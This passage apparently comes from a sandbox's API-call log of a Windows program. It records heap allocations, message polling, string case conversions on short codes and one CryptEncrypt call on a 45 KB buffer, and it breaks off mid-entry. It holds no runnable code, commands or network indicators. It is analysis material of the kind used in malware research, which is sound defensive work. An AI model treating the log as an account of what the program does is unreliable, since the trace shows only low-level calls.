RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.641] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.642] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.642] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.643] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.644] CharLowerBuffW (in: lpsz="byte[45040]", cchLength=0xb | out: lpsz="byte[45040]") returned 0xb [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.644] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0252.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0252.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.647] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.647] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.647] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.647] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.648] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.649] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xafeb, dwBufLen=0xaff0 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xaff0) returned 1 [0252.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0252.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.651] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0252.654] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.654] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.654] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.654] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.655] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.655] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.655] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.657] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.658] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.658] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.659] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.659] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.659] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.660] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.660] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.664] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.664] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.664] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.666] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.666] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0252.666] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.667] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0252.667] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.667] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.667] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.667] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 